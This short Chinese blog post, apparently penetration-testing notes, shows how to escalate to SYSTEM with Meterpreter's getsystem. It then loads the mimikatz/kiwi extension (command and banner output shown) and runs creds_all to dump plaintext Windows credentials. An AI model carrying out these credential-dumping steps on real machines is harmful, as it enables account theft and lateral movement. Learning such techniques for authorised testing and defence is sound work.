170 字
1 分钟
通过MSF模块mimikatz or kiwi获得密码明文
2025-03-09
安全
内网安全
/
提权思路

通过MSF模块mimikatz or kiwi获得密码明文#

mimikatz模块的使用需要Administrator权限或者System权限,这就我们为什么需要getsystem

所以首先得进行用户提权

  1. 用户提权

    内存迁移或在 msf 使用 getsystem 进行提权

  2. 使用MSF里的mimikatz模块

    • 加载mimikatz 模块

      meterpreter > load mimikatz
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.

    • 运行creds_all 命令,获得所有凭据

通过MSF模块mimikatz or kiwi获得密码明文
https://sunset-blog.top/posts/通过msf模块mimikatz-or-kiwi获得密码明文/
作者
Sunset
发布于
2025-03-09
许可协议
CC BY-NC-SA 4.0
© 2025 Sunset. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari